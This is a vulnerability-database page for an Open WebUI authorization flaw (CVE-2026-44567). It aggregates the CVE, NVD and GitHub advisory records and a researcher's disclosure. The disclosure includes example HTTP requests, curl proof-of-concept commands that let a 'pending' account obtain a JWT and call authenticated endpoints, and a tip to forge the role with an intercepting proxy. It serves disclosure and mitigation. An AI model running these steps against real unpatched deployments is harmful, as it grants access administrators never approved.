CVE-2026-44567 (GCVE-0-2026-44567)

Vulnerability from cvelistv5 – Published: 2026-05-15 20:59 – Updated: 2026-05-18 16:11

Title

Open WebUI: Open WebUI Improper Authorization Control

Summary

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.1.124, the API does not properly validate that the user has an authorized user role of user. By default, when Open WebUI is configured with new sign-ups enabled, the default user role is set to pending. In this configuration, an administrator is required to go into the Admin management panel following a new user registration and reconfigure the user to have a role of either user or admin before that user is able to access the web application. This vulnerability is fixed in 0.1.124.

Severity ?

7.3 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CWE

CWE-863 - Incorrect Authorization
CWE-602 - Client-Side Enforcement of Server-Side Security

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/open-webui/open-webui/security…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
open-webui	open-webui	Affected: < 0.1.124

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-44567",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-18T16:11:13.676603Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-18T16:11:39.808Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-4vg5-rp28-gvjf"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "open-webui",
          "vendor": "open-webui",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.1.124"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.1.124, the API does not properly validate that the user has an authorized user role of user. By default, when Open WebUI is configured with new sign-ups enabled, the default user role is set to pending. In this configuration, an administrator is required to go into the Admin management panel following a new user registration and reconfigure the user to have a role of either user or admin before that user is able to access the web application. This vulnerability is fixed in 0.1.124."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-863",
              "description": "CWE-863: Incorrect Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-602",
              "description": "CWE-602: Client-Side Enforcement of Server-Side Security",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-15T20:59:17.794Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/open-webui/open-webui/security/advisories/GHSA-4vg5-rp28-gvjf",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-4vg5-rp28-gvjf"
        }
      ],
      "source": {
        "advisory": "GHSA-4vg5-rp28-gvjf",
        "discovery": "UNKNOWN"
      },
      "title": "Open WebUI:  Open WebUI Improper Authorization Control"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-44567",
    "datePublished": "2026-05-15T20:59:17.794Z",
    "dateReserved": "2026-05-06T20:59:00.595Z",
    "dateUpdated": "2026-05-18T16:11:39.808Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-44567",
      "date": "2026-05-24",
      "epss": "0.00098",
      "percentile": "0.26753"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-44567\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-15T22:16:53.050\",\"lastModified\":\"2026-05-19T16:38:15.117\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.1.124, the API does not properly validate that the user has an authorized user role of user. By default, when Open WebUI is configured with new sign-ups enabled, the default user role is set to pending. In this configuration, an administrator is required to go into the Admin management panel following a new user registration and reconfigure the user to have a role of either user or admin before that user is able to access the web application. This vulnerability is fixed in 0.1.124.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\",\"baseScore\":7.3,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":3.9,\"impactScore\":3.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-602\"},{\"lang\":\"en\",\"value\":\"CWE-863\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.1.124\",\"matchCriteriaId\":\"CA2AF09D-ABFB-4C43-9B6F-87AA292B548D\"}]}]}],\"references\":[{\"url\":\"https://github.com/open-webui/open-webui/security/advisories/GHSA-4vg5-rp28-gvjf\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\",\"Mitigation\"]},{\"url\":\"https://github.com/open-webui/open-webui/security/advisories/GHSA-4vg5-rp28-gvjf\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\",\"Mitigation\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-44567\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-18T16:11:13.676603Z\"}}}], \"references\": [{\"url\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-4vg5-rp28-gvjf\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-18T16:10:28.328Z\"}}], \"cna\": {\"title\": \"Open WebUI:  Open WebUI Improper Authorization Control\", \"source\": {\"advisory\": \"GHSA-4vg5-rp28-gvjf\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"open-webui\", \"product\": \"open-webui\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.1.124\"}]}], \"references\": [{\"url\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-4vg5-rp28-gvjf\", \"name\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-4vg5-rp28-gvjf\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.1.124, the API does not properly validate that the user has an authorized user role of user. By default, when Open WebUI is configured with new sign-ups enabled, the default user role is set to pending. In this configuration, an administrator is required to go into the Admin management panel following a new user registration and reconfigure the user to have a role of either user or admin before that user is able to access the web application. This vulnerability is fixed in 0.1.124.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-863\", \"description\": \"CWE-863: Incorrect Authorization\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-602\", \"description\": \"CWE-602: Client-Side Enforcement of Server-Side Security\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-15T20:59:17.794Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-44567\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-18T16:11:39.808Z\", \"dateReserved\": \"2026-05-06T20:59:00.595Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-15T20:59:17.794Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-44567

Vulnerability from fkie_nvd - Published: 2026-05-15 22:16 - Updated: 2026-05-19 16:38

Severity ?

7.3 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/open-webui/open-webui/security/advisories/GHSA-4vg5-rp28-gvjf	Exploit, Vendor Advisory, Mitigation
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/open-webui/open-webui/security/advisories/GHSA-4vg5-rp28-gvjf	Exploit, Vendor Advisory, Mitigation

Impacted products

	Vendor	Product	Version
	openwebui	open_webui	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "CA2AF09D-ABFB-4C43-9B6F-87AA292B548D",
              "versionEndExcluding": "0.1.124",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.1.124, the API does not properly validate that the user has an authorized user role of user. By default, when Open WebUI is configured with new sign-ups enabled, the default user role is set to pending. In this configuration, an administrator is required to go into the Admin management panel following a new user registration and reconfigure the user to have a role of either user or admin before that user is able to access the web application. This vulnerability is fixed in 0.1.124."
    }
  ],
  "id": "CVE-2026-44567",
  "lastModified": "2026-05-19T16:38:15.117",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 7.3,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.4,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-15T22:16:53.050",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory",
        "Mitigation"
      ],
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-4vg5-rp28-gvjf"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory",
        "Mitigation"
      ],
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-4vg5-rp28-gvjf"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-602"
        },
        {
          "lang": "en",
          "value": "CWE-863"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-4VG5-RP28-GVJF

Vulnerability from github – Published: 2026-05-08 22:34 – Updated: 2026-05-19 15:57

Summary

Open WebUI has Improper Authorization Control

Details

CONFIDENTIAL

Vulnerability Disclosure Analysis Documentation

Vulnerability Details

#	Field	Value
1	Discoverer	Taylor Pennington of KoreLogic, Inc.
2	Date Submitted	June 11, 2024
3	Title	Open WebUI Improper Authorization Control
5	Affected Vendor	Open WebUI
6	Affected Product(s)	Open WebUI (Formerly Ollama WebUI)
7	Affected Version(s)	0.1.105
8	Platform/OS	Debian GNU/Linux 12 (bookworm)
9	Vector	HTTP web interface
10	CWE	285 Improper Authorization

4. High-level Summary

There is a missing authorization check affecting user accounts with a pending status allowing the user to make authenticated API calls as a user context.

11. Technical Analysis

The Open WebUI web application has three user role classifications: user, admin, and pending. By default, when Open WebUI is configured with new sign-ups enabled, the default user role is set to pending. In this configuration, an administrator is required to go into the Admin management panel following a new user registration and reconfigure the user to have a role of either user or admin before that user is able to access the web application. However, this check is only enforced at the client presentation layer, the API does not properly validate that the user has an authorized user role of user.

Request

POST /api/v1/auths/signup HTTP/1.1
Host: openwebui.example.com
Content-Length: 60

{ 
 "name": "", 
 "email": "bad_guy@korelogic.com", 
 "password": "a" 
 }

Response

HTTP/1.1 200 OK
...

{
"id": "f839557a-031a-47a5-9999-0b0998f8f959",
"email": "bad_guy@korelogic.com",
"name": "",
"role": "pending",
"profile_image_url": "/user.png",
"token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImY4Mzk1NTdhLTAzMWEtNDdhNS05OTk5LTBiMDk5OGY4Zjk1OSJ9.Bk-S4ABXb1tRuiVNfOJYbQFB8ewixWA4a1FohvIZARs",
"token_type": "Bearer"
}

An attacker can then use the JWT in the above response to make direct API calls or they can forge the authentication response and use the web UI.

With the JWT, an attacker can now query the LLM. However, for this demonstration we will query the /ollama/api/tags endpoint and get a list of available models as this is an authenticated endpoint. Attempting to make this request without a valid JWT returns an HTTP 401 Unauthorized response.

Request

GET /ollama/api/tags HTTP/1.1
Host: openwebui.example.com
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImY4Mzk1NTdhLTAzMWEtNDdhNS05OTk5LTBiMDk5OGY4Zjk1OSJ9.Bk-S4ABXb1tRuiVNfOJYbQFB8ewixWA4a1FohvIZARs

Response

HTTP/1.1 200 OK
...

{
"models": [
    {
    "name": "ollama.com/emsi/mixtral-8x22b:latest",
    "model": "ollama.com/emsi/mixtral-8x22b:latest",
    "modified_at": "2024-04-12T17:27:51.479356401-04:00",
    "size": 79509285991,
    "digest": "9b000033acd802656a652c7df4e25300a61d903cd3c8eb065a50aaace484c319",
    "details": {
        "parent_model": "",
        "format": "gguf",
        "family": "llama",
        "families": ["llama"],
        "parameter_size": "141B",
        "quantization_level": "Q4_0"
    },
    "urls": [0]
    },
    ...
]
}

The logic for this endpoint can be seen here: https://github.com/open-webui/open-webui/blob/0399a69b73de9789c4221acedea70d528e1346c4/backend/apps/ollama/main.py#L163-L180

As shown below, the login checks if url_idx is None and if so, call get_all_mdoels and assign the result to models after that the logic checks if app.state.MODEL_FILTER_ENABLED is true and if not, it returns the result. As MODEL_FILTER_ENABLED is not configured by default, the application will not attempt to further validate the user.

@app.get("/api/tags")
@app.get("/api/tags/{url_idx}")
async def get_ollama_tags(
    url_idx: Optional[int] = None, user=Depends(get_current_user)
):
    if url_idx == None:
        models = await get_all_models()

        if app.state.MODEL_FILTER_ENABLED:
            if user.role == "user":
                models["models"] = list(
                    filter(
                        lambda model: model["name"] in app.state.MODEL_FILTER_LIST,
                        models["models"],
                    )
                )
                return models
        return models

This is just an example of one API endpoint but all other regular user accessible endpoints were accessible to a pending user.

The vulnerability is caused by a missing authorization check that occurs with user=Depends(get_current_user). The logic of that function is found here: https://github.com/open-webui/open-webui/blob/0399a69b73de9789c4221acedea70d528e1346c4/backend/utils/utils.py#L77-L97

def get_current_user(
auth_token: HTTPAuthorizationCredentials = Depends(bearer_security),
):
    # auth by api key
    if auth_token.credentials.startswith("sk-"):
        return get_current_user_by_api_key(auth_token.credentials)
    # auth by jwt token
    data = decode_token(auth_token.credentials)
    if data != None and "id" in data:
        user = Users.get_user_by_id(data["id"])
        if user is None:
            raise HTTPException(
                status_code=status.HTTP_401_UNAUTHORIZED,
                detail=ERROR_MESSAGES.INVALID_TOKEN,
            )
        return user
    else:
        raise HTTPException(
            status_code=status.HTTP_401_UNAUTHORIZED,
            detail=ERROR_MESSAGES.UNAUTHORIZED,
        )

As shown above, this logic does not verify the role of the user, the function simples checks if the JWT is valid.

12. Proof-of-Concept

First, verify that an unauthenticated user receives {"detail":"401 Unauthorized"}:

curl -s -X $'GET' \
    -H $'Host: openwebui.example.com' \
    -H $'Content-Type: application/json' \
    $'https://openwebui.example.com/ollama/api/tags'

The above curl command will return: {"detail":"401 Unauthorized"} as no Authorization Bearer token is provided.

Now to access the authentication endpoint, two calls will be made. The first cURL creates an account and sets the $JWT environment variable which will be utilized in the subsequent cURL command.

export JWT=$(curl -s -X POST \
    -H 'Host: openwebui.example.com' -H 'Content-Length: 60' \
    -H 'Content-Type: application/json' \
    --data '{"name":"","email":"bad_guy@korelogic.com","password":"a"}' \
    'https://openwebui.example.com/api/v1/auths/signup' | jq '.token'|tr -d '"')

curl -v $'GET' \
    -H $'Host: openwebui.example.com' \
    -H $'Content-Type: application/json' \
    -H $'Authorization: Bearer ${JWT}' -H $'Content-Length: 2' \
    --data-binary $'\x0d\x0a' \
    $'https://openwebui.example.com/ollama/api/tags'

Additionally the "role":"pending" value in the HTTP response can be forged from POST /api/v1/auths/signin and GET /api/v1/auths/ to utilize the full website. This can be achieved with a man-in-the-middle proxy such as Burp or Zap and modifying pending to user.

13. Mitigation Recommendation

The application currently has a function for checking if the user is authorized. However, it is not being utilized except for one endpoint. See https://github.com/open-webui/open-webui/blob/0399a69b73de9789c4221acedea70d528e1346c4/backend/utils/utils.py#L110-L116 for the correct function to use.

def get_verified_user(user=Depends(get_current_user)):
if user.role not in {"user", "admin"}:
    raise HTTPException(
        status_code=status.HTTP_401_UNAUTHORIZED,
        detail=ERROR_MESSAGES.ACCESS_PROHIBITED,
    )
return user

Modify all authenticated endpoints to utilize get_verified_user() function instead of get_current_user().

Severity ?

7.3 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.1.123"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "open-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.1.124"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44567"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-602",
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-08T22:34:12Z",
    "nvd_published_at": "2026-05-15T22:16:53Z",
    "severity": "HIGH"
  },
  "details": "# **CONFIDENTIAL**\n\n# Vulnerability Disclosure Analysis Documentation\n\n---\n\n## Vulnerability Details\n\n| # | Field | Value |\n|---|-------|-------|\n| 1 | **Discoverer** | Taylor Pennington of KoreLogic, Inc. |\n| 2 | **Date Submitted** | June 11, 2024 |\n| 3 | **Title** | Open WebUI Improper Authorization Control |\n| 5 | **Affected Vendor** | Open WebUI |\n| 6 | **Affected Product(s)** | Open WebUI (Formerly Ollama WebUI) |\n| 7 | **Affected Version(s)** | 0.1.105 |\n| 8 | **Platform/OS** | Debian GNU/Linux 12 (bookworm) |\n| 9 | **Vector** | HTTP web interface |\n| 10 | **CWE** | 285 Improper Authorization |\n\n---\n\n## 4. High-level Summary\n\nThere is a missing authorization check affecting user accounts with a `pending` status allowing the user to make authenticated API calls as a `user` context.\n\n---\n\n## 11. Technical Analysis\n\nThe Open WebUI web application has three user role classifications: `user`, `admin`, and `pending`. By default, when Open WebUI is configured with `new sign-ups` enabled, the default user role is set to `pending`. In this configuration, an administrator is required to go into the Admin management panel following a new user registration and reconfigure the user to have a role of either `user` or `admin` before that user is able to access the web application. However, this check is only enforced at the client presentation layer, the API does not properly validate that the user has an authorized user role of `user`.\n\n### Request\n\n```http\nPOST /api/v1/auths/signup HTTP/1.1\nHost: openwebui.example.com\nContent-Length: 60\n\n{ \n \"name\": \"\", \n \"email\": \"bad_guy@korelogic.com\", \n \"password\": \"a\" \n }\n```\n\n### Response\n\n```http\nHTTP/1.1 200 OK\n...\n\n{\n\"id\": \"f839557a-031a-47a5-9999-0b0998f8f959\",\n\"email\": \"bad_guy@korelogic.com\",\n\"name\": \"\",\n\"role\": \"pending\",\n\"profile_image_url\": \"/user.png\",\n\"token\": \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImY4Mzk1NTdhLTAzMWEtNDdhNS05OTk5LTBiMDk5OGY4Zjk1OSJ9.Bk-S4ABXb1tRuiVNfOJYbQFB8ewixWA4a1FohvIZARs\",\n\"token_type\": \"Bearer\"\n}\n```\n\nAn attacker can then use the JWT in the above response to make direct API calls or they can forge the authentication response and use the web UI.\n\nWith the JWT, an attacker can now query the LLM. However, for this demonstration we will query the `/ollama/api/tags` endpoint and get a list of available models as this is an authenticated endpoint. Attempting to make this request without a valid JWT returns an HTTP `401 Unauthorized` response.\n\n### Request\n\n```http\nGET /ollama/api/tags HTTP/1.1\nHost: openwebui.example.com\nAuthorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImY4Mzk1NTdhLTAzMWEtNDdhNS05OTk5LTBiMDk5OGY4Zjk1OSJ9.Bk-S4ABXb1tRuiVNfOJYbQFB8ewixWA4a1FohvIZARs\n```\n\n### Response\n\n```http\nHTTP/1.1 200 OK\n...\n\n{\n\"models\": [\n    {\n    \"name\": \"ollama.com/emsi/mixtral-8x22b:latest\",\n    \"model\": \"ollama.com/emsi/mixtral-8x22b:latest\",\n    \"modified_at\": \"2024-04-12T17:27:51.479356401-04:00\",\n    \"size\": 79509285991,\n    \"digest\": \"9b000033acd802656a652c7df4e25300a61d903cd3c8eb065a50aaace484c319\",\n    \"details\": {\n        \"parent_model\": \"\",\n        \"format\": \"gguf\",\n        \"family\": \"llama\",\n        \"families\": [\"llama\"],\n        \"parameter_size\": \"141B\",\n        \"quantization_level\": \"Q4_0\"\n    },\n    \"urls\": [0]\n    },\n    ...\n]\n}\n```\n\nThe logic for this endpoint can be seen here:\n\u003chttps://github.com/open-webui/open-webui/blob/0399a69b73de9789c4221acedea70d528e1346c4/backend/apps/ollama/main.py#L163-L180\u003e\n\nAs shown below, the login checks if `url_idx` is `None` and if so, call `get_all_mdoels` and assign the result to `models` after that the logic checks if `app.state.MODEL_FILTER_ENABLED` is true and if not, it returns the result. As `MODEL_FILTER_ENABLED` is not configured by default, the application will not attempt to further validate the user.\n\n```python\n@app.get(\"/api/tags\")\n@app.get(\"/api/tags/{url_idx}\")\nasync def get_ollama_tags(\n    url_idx: Optional[int] = None, user=Depends(get_current_user)\n):\n    if url_idx == None:\n        models = await get_all_models()\n        \n        if app.state.MODEL_FILTER_ENABLED:\n            if user.role == \"user\":\n                models[\"models\"] = list(\n                    filter(\n                        lambda model: model[\"name\"] in app.state.MODEL_FILTER_LIST,\n                        models[\"models\"],\n                    )\n                )\n                return models\n        return models\n```\n\nThis is just an example of one API endpoint but all other regular user accessible endpoints were accessible to a pending user.\n\nThe vulnerability is caused by a missing authorization check that occurs with `user=Depends(get_current_user)`. The logic of that function is found here:\n\u003chttps://github.com/open-webui/open-webui/blob/0399a69b73de9789c4221acedea70d528e1346c4/backend/utils/utils.py#L77-L97\u003e\n\n```python\ndef get_current_user(\nauth_token: HTTPAuthorizationCredentials = Depends(bearer_security),\n):\n    # auth by api key\n    if auth_token.credentials.startswith(\"sk-\"):\n        return get_current_user_by_api_key(auth_token.credentials)\n    # auth by jwt token\n    data = decode_token(auth_token.credentials)\n    if data != None and \"id\" in data:\n        user = Users.get_user_by_id(data[\"id\"])\n        if user is None:\n            raise HTTPException(\n                status_code=status.HTTP_401_UNAUTHORIZED,\n                detail=ERROR_MESSAGES.INVALID_TOKEN,\n            )\n        return user\n    else:\n        raise HTTPException(\n            status_code=status.HTTP_401_UNAUTHORIZED,\n            detail=ERROR_MESSAGES.UNAUTHORIZED,\n        )\n```\n\nAs shown above, this logic does not verify the role of the user, the function simples checks if the JWT is valid.\n\n---\n\n## 12. Proof-of-Concept\n\nFirst, verify that an unauthenticated user receives `{\"detail\":\"401 Unauthorized\"}`:\n\n```bash\ncurl -s -X $\u0027GET\u0027 \\\n    -H $\u0027Host: openwebui.example.com\u0027 \\\n    -H $\u0027Content-Type: application/json\u0027 \\\n    $\u0027https://openwebui.example.com/ollama/api/tags\u0027\n```\n\nThe above curl command will return: `{\"detail\":\"401 Unauthorized\"}` as no Authorization Bearer token is provided.\n\nNow to access the authentication endpoint, two calls will be made. The first cURL creates an account and sets the `$JWT` environment variable which will be utilized in the subsequent cURL command.\n\n```bash\nexport JWT=$(curl -s -X POST \\\n    -H \u0027Host: openwebui.example.com\u0027 -H \u0027Content-Length: 60\u0027 \\\n    -H \u0027Content-Type: application/json\u0027 \\\n    --data \u0027{\"name\":\"\",\"email\":\"bad_guy@korelogic.com\",\"password\":\"a\"}\u0027 \\\n    \u0027https://openwebui.example.com/api/v1/auths/signup\u0027 | jq \u0027.token\u0027|tr -d \u0027\"\u0027)\n\ncurl -v $\u0027GET\u0027 \\\n    -H $\u0027Host: openwebui.example.com\u0027 \\\n    -H $\u0027Content-Type: application/json\u0027 \\\n    -H $\u0027Authorization: Bearer ${JWT}\u0027 -H $\u0027Content-Length: 2\u0027 \\\n    --data-binary $\u0027\\x0d\\x0a\u0027 \\\n    $\u0027https://openwebui.example.com/ollama/api/tags\u0027\n```\n\nAdditionally the `\"role\":\"pending\"` value in the HTTP response can be forged from `POST /api/v1/auths/signin` and `GET /api/v1/auths/` to utilize the full website. This can be achieved with a man-in-the-middle proxy such as Burp or Zap and modifying `pending` to `user`.\n\n---\n\n## 13. Mitigation Recommendation\n\nThe application currently has a function for checking if the user is authorized. However, it is not being utilized except for one endpoint. See \u003chttps://github.com/open-webui/open-webui/blob/0399a69b73de9789c4221acedea70d528e1346c4/backend/utils/utils.py#L110-L116\u003e for the correct function to use.\n\n```python\ndef get_verified_user(user=Depends(get_current_user)):\nif user.role not in {\"user\", \"admin\"}:\n    raise HTTPException(\n        status_code=status.HTTP_401_UNAUTHORIZED,\n        detail=ERROR_MESSAGES.ACCESS_PROHIBITED,\n    )\nreturn user\n```\n\nModify all authenticated endpoints to utilize `get_verified_user()` function instead of `get_current_user()`.",
  "id": "GHSA-4vg5-rp28-gvjf",
  "modified": "2026-05-19T15:57:37Z",
  "published": "2026-05-08T22:34:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-4vg5-rp28-gvjf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44567"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/open-webui/open-webui"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Open WebUI has Improper Authorization Control"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-44567 (GCVE-0-2026-44567)

FKIE_CVE-2026-44567

GHSA-4VG5-RP28-GVJF

CONFIDENTIAL

Vulnerability Disclosure Analysis Documentation

Vulnerability Details

4. High-level Summary

11. Technical Analysis

Request

Response

Request

Response

12. Proof-of-Concept

13. Mitigation Recommendation

Tags

Sightings

Nomenclature